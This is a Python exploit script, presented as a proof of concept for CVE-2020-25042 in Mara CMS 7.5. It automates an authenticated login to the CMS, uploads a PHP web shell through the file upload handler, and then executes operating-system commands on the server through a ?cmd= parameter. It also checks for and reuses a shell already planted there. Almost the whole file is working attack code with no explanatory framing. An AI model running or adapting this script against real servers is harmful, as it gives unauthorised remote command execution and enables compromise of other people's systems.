from __future__ import annotations import argparse import base64 import hashlib import random import re import string import sys import urllib.parse from datetime import datetime, timezone try: import requests import urllib3 except Exception: requests = None urllib3 = None if urllib3 is not None: urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) RESET = "\033[0m" BOLD = "\033[1m" DIM = "\033[2m" GREEN = "\033[32m" CYAN = "\033[36m" YELLOW = "\033[33m" RED = "\033[31m" DEFAULT_PAGE = "lorem.php" DEFAULT_USERNAME = "admin" DEFAULT_PASSWORD = "changeme" DEFAULT_CMD = "id" DEFAULT_TIMEOUT = 20 DEFAULT_SHELL_NAME = "mara-poc.php" PAYLOAD_MARKER = "MARA_CVE_2020_25042_OK" USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" AJAX_USER_AGENT = "Firefoxy" EMPTY_SHA256 = hashlib.sha256(b"").hexdigest() class Console: def __init__( self, only_final: bool = False, no_color: bool = False, debug_enabled: bool = False, ) -> None: self.only_final = only_final self.no_color = no_color or not sys.stdout.isatty() self.debug_enabled = debug_enabled def color(self, text: str, code: str) -> str: if self.no_color: return text return f"{code}{text}{RESET}" def log(self, marker: str, message: str, color: str = RESET) -> None: if self.only_final: return ts = datetime.now(timezone.utc).isoformat(timespec="seconds").replace("+00:00", "Z") prefix = self.color(f"[{ts}]", DIM) print(f"{prefix} {self.color(marker, color)} {message}", flush=True) def info(self, message: str) -> None: self.log("[*]", message, CYAN) def ok(self, message: str) -> None: self.log("[+]", message, GREEN) def warn(self, message: str) -> None: self.log("[!]", message, YELLOW) def error(self, message: str) -> None: self.log("[-]", message, RED) def debug(self, message: str) -> None: if self.debug_enabled: self.log("[d]", message, DIM) def result(self, title: str, content: str) -> None: if self.only_final: print(content.strip()) return print("") print(self.color(f"[+] {title}", BOLD + GREEN)) print(content.rstrip()) console = Console() def log_info(message: str) -> None: console.info(message) def log_success(message: str) -> None: console.ok(message) def log_warning(message: str) -> None: console.warn(message) def log_error(message: str) -> None: console.error(message) def sha256_hex(value: str) -> str: return hashlib.sha256(value.encode("utf-8")).hexdigest() def b64(value: str) -> str: return base64.b64encode(value.encode("utf-8")).decode("ascii") def b64_decode(value: str) -> str: return base64.b64decode(value.encode("ascii"), validate=False).decode("utf-8", "ignore") def random_php_name() -> str: suffix = "".join(random.choices(string.ascii_lowercase + string.digits, k=8)) return f"mara-poc-{suffix}.php" def ensure_scheme(url: str) -> str: if url.startswith(("http://", "https://")): return url return f"http://{url}" def default_payload() -> str: return ( "\n" ) class MaraCMSCVE202025042: def __init__( self, base_url: str, page: str, username: str, password: str, shell_name: str, command: str, destdir: str, shell_url_path: str | None, payload: str, timeout: int, verify_tls: bool, force_upload: bool, ) -> None: self.base_url = ensure_scheme(base_url).rstrip("/") self.page = page.lstrip("/") self.username = username self.password = password self.shell_name = shell_name self.command = command self.destdir = destdir self.shell_url_path = shell_url_path self.payload = payload self.timeout = timeout self.verify_tls = verify_tls self.force_upload = force_upload self.session = requests.Session() self.session.headers.update({"User-Agent": USER_AGENT}) self.shash = "" self.nacl = "" self.password_hash = "" self.salted_password_hash = "" self.imgdir = "img/" self.last_raw_response = "" def url(self, path: str) -> str: return f"{self.base_url}/{path.lstrip('/')}" def origin_url(self, path: str) -> str: parsed = urllib.parse.urlparse(self.base_url) origin = f"{parsed.scheme}://{parsed.netloc}" return f"{origin}/{path.lstrip('/')}" def request( self, method: str, path: str, *, params: dict[str, str] | None = None, data: dict[str, str] | list[tuple[str, str]] | None = None, files: dict[str, tuple[str, str, str]] | None = None, headers: dict[str, str] | None = None, allow_redirects: bool = True, ) -> requests.Response: target = self.url(path) console.debug(f"{method.upper()} {target}") try: response = self.session.request( method=method, url=target, params=params, data=data, files=files, headers=headers, timeout=self.timeout, allow_redirects=allow_redirects, verify=self.verify_tls, ) except requests.RequestException as error: log_error(f"Request failed: {error}") sys.exit(1) console.debug(f"HTTP {response.status_code} from {response.url}") return response def ajax_fields( self, action: str, *, usr: str = "", password_hash: str = "", salted_password_hash: str = "", authenticated: str = "", rawresponse: str = "", response: str = "", status: str = "Sending Request", ) -> dict[str, str]: return { "usr": b64(usr), "hash": b64(password_hash), "pwd": b64(salted_password_hash), "authenticated": b64(authenticated), "action": b64(action), "headsection": b64(""), "data": b64(""), "enccrc": EMPTY_SHA256, "crc": b64(""), "srcfile": b64(""), "destfile": b64(""), "rawresponse": b64(rawresponse), "response": b64(response), "status": b64(status), "error": b64(""), } def parse_ajax_response(self, text: str) -> str: parts = text.split("~::~") if len(parts) < 3 or not parts[1]: return "" try: return b64_decode(parts[1]) except Exception: return "" def load_login_page(self) -> None: log_info("Loading Mara CMS page and collecting session data") response = self.request( "GET", self.page, params={"login": self.username}, ) if response.status_code != 200: log_error(f"Could not load login page | HTTP {response.status_code}") sys.exit(1) shash_match = re.search(r"shash=['\"]([^'\"]+)['\"]", response.text) if not shash_match: log_error("Could not find shash in page source") sys.exit(1) imgdir_match = re.search(r"var\s+imgdir=['\"]([^'\"]+)['\"]", response.text) if imgdir_match and imgdir_match.group(1): self.imgdir = imgdir_match.group(1) self.shash = shash_match.group(1) log_success(f"Found shash: {self.shash}") console.debug(f"Image directory: {self.imgdir}") def get_salt(self) -> None: log_info("Requesting login salt") response = self.request( "POST", "codebase/handler.php", params={"nocache": str(random.random())}, data=self.ajax_fields("setsalt"), headers={ "User-Agent": AJAX_USER_AGENT, "Content-Type": "application/x-www-form-urlencoded", }, ) if response.status_code != 200: log_error(f"Could not get salt | HTTP {response.status_code}") sys.exit(1) salt = self.parse_ajax_response(response.text) if not salt: log_error("Could not parse salt from handler response") console.debug(response.text[:300].replace("\n", " ")) sys.exit(1) self.nacl = salt self.last_raw_response = response.text log_success(f"Got salt: {self.nacl}") def login(self) -> None: self.load_login_page() self.get_salt() self.password_hash = sha256_hex(f"{self.password}{self.shash}{self.username}") self.salted_password_hash = sha256_hex(f"{self.password_hash}{self.nacl}") log_info(f"Logging in as {self.username}") response = self.request( "POST", "codebase/handler.php", params={"nocache": str(random.random())}, data=self.ajax_fields( "login", usr=self.username, password_hash=self.password_hash, salted_password_hash=self.salted_password_hash, rawresponse=self.last_raw_response, ), headers={ "User-Agent": AJAX_USER_AGENT, "Content-Type": "application/x-www-form-urlencoded", }, ) decoded = self.parse_ajax_response(response.text) if response.status_code != 200 or not decoded.startswith("OK"): log_error("Login failed") if decoded: log_error(f"Handler response: {decoded}") else: console.debug(response.text[:300].replace("\n", " ")) sys.exit(1) log_success(f"Login successful: {decoded}") def open_upload_form(self) -> None: log_info("Opening upload form") first = self.request("GET", "codebase/dir.php", params={"type": "filenew"}) if first.status_code != 200: log_warning(f"Upload page returned HTTP {first.status_code}") iframe = self.request( "GET", "codebase/dir.php", params={"iframe": "1", "type": "filenew"}, ) if iframe.status_code != 200: log_warning(f"Upload iframe returned HTTP {iframe.status_code}") def upload_shell(self) -> None: log_info(f"Uploading PHP payload as {self.shell_name}") form = [ ("authenticated", b64("1")), ("action", b64("upload")), ("MAX_FILE_SIZE", "10485760"), ("type", "filenew"), ("usr", b64(self.username)), ("pwd", b64(self.salted_password_hash)), ("authenticated", b64("1")), ("destdir", self.destdir), ] files = { "files[]": ( self.shell_name, self.payload, "application/x-php", ) } response = self.request( "POST", "codebase/handler.php", data=form, files=files, headers={"Referer": self.url("codebase/dir.php?type=filenew")}, ) if response.status_code not in (200, 302): log_error(f"Upload failed | HTTP {response.status_code}") if response.text: log_error(response.text[:300].replace("\n", " ")) sys.exit(1) log_success("Upload request completed") console.debug(response.text[:300].replace("\n", " ")) def shell_url(self) -> str: if self.shell_url_path: parsed = urllib.parse.urlparse(self.shell_url_path) if parsed.scheme and parsed.netloc: return self.shell_url_path if self.shell_url_path.startswith("/"): return self.origin_url(self.shell_url_path) return self.url(self.shell_url_path) if self.destdir: path = self.destdir.strip("/") else: path = self.imgdir.strip("/") if path: return self.url(f"{path}/{self.shell_name}") return self.url(self.shell_name) def execute_command(self) -> None: shell_url = self.shell_url() log_success(f"Shell URL: {shell_url}") log_info(f"Executing command: {self.command}") try: response = self.session.get( shell_url, params={"cmd": self.command}, timeout=self.timeout, verify=self.verify_tls, ) except requests.RequestException as error: log_error(f"Command request failed: {error}") sys.exit(1) if response.status_code != 200: log_error(f"Command execution failed | HTTP {response.status_code}") if response.text: log_error(response.text[:300].replace("\n", " ")) sys.exit(1) console.result("Command output", response.text) def shell_is_reusable(self) -> bool: shell_url = self.shell_url() log_info(f"Checking existing shell: {shell_url}") try: response = self.session.get( shell_url, params={"cmd": "echo reusable"}, timeout=self.timeout, verify=self.verify_tls, ) except requests.RequestException as error: console.debug(f"Reusable shell check failed: {error}") return False if response.status_code != 200: console.debug(f"Reusable shell check returned HTTP {response.status_code}") return False if PAYLOAD_MARKER not in response.text: console.debug("Reusable shell marker was not found") return False log_success("Existing shell is reusable") return True def run(self, execute: bool) -> None: if not self.force_upload and self.shell_is_reusable(): if execute: self.execute_command() else: log_success(f"Reusable shell: {self.shell_url()}") return self.login() self.open_upload_form() self.upload_shell() if execute: self.execute_command() return log_success(f"Uploaded shell: {self.shell_url()}") def read_payload(path: str | None) -> str: if not path: return default_payload() try: with open(path, "r", encoding="utf-8") as file: return file.read() except OSError as error: log_error(f"Could not read payload file: {error}") sys.exit(1) def main() -> None: parser = argparse.ArgumentParser( description="CVE-2020-25042 Mara CMS 7.5 authenticated arbitrary PHP upload PoC" ) parser.add_argument( "--url", required=True, help="Mara CMS base URL. Example: http://target/cms", ) parser.add_argument( "--page", default=DEFAULT_PAGE, help=f"Existing CMS page used for login bootstrap. Default: {DEFAULT_PAGE}", ) parser.add_argument( "--username", default=DEFAULT_USERNAME, help=f"CMS username. Default: {DEFAULT_USERNAME}", ) parser.add_argument( "--password", default=DEFAULT_PASSWORD, help=f"CMS password. Default: {DEFAULT_PASSWORD}", ) parser.add_argument( "--shell-name", default=DEFAULT_SHELL_NAME, help=f"Name for uploaded PHP file. Default: {DEFAULT_SHELL_NAME}", ) parser.add_argument( "--cmd", default=DEFAULT_CMD, help=f"Command to run after upload. Default: {DEFAULT_CMD}", ) parser.add_argument( "--destdir", default="", help="Raw upload destdir form value. Default leaves Mara CMS using img/", ) parser.add_argument( "--shell-url-path", help="Override shell URL/path if the file is exposed outside img/. Example: /cms/webshell.php", ) parser.add_argument( "--payload-file", help="Custom PHP payload file to upload. Default payload runs commands from ?cmd=", ) parser.add_argument( "--upload-only", action="store_true", help="Upload payload but do not execute --cmd", ) parser.add_argument( "--force-upload", action="store_true", help="Always login and upload the payload, even if a reusable shell exists", ) parser.add_argument( "--timeout", type=int, default=DEFAULT_TIMEOUT, help=f"HTTP timeout in seconds. Default: {DEFAULT_TIMEOUT}", ) parser.add_argument( "--verify-tls", action="store_true", help="Verify TLS certificates", ) parser.add_argument( "--only-final", action="store_true", help="Hide progress logs and print only command output", ) parser.add_argument( "--no-color", action="store_true", help="Disable ANSI colors", ) parser.add_argument( "--debug", action="store_true", help="Show request URLs and handler snippets", ) args = parser.parse_args() global console console = Console( only_final=args.only_final, no_color=args.no_color, debug_enabled=args.debug, ) if requests is None: log_error("Missing dependency: requests. Install it with: pip install requests") sys.exit(2) if not args.shell_name.endswith(".php"): log_error("--shell-name must end with .php") sys.exit(1) exploit = MaraCMSCVE202025042( base_url=args.url, page=args.page, username=args.username, password=args.password, shell_name=args.shell_name, command=args.cmd, destdir=args.destdir, shell_url_path=args.shell_url_path, payload=read_payload(args.payload_file), timeout=args.timeout, verify_tls=args.verify_tls, force_upload=args.force_upload, ) exploit.run(execute=not args.upload_only) if __name__ == "__main__": main()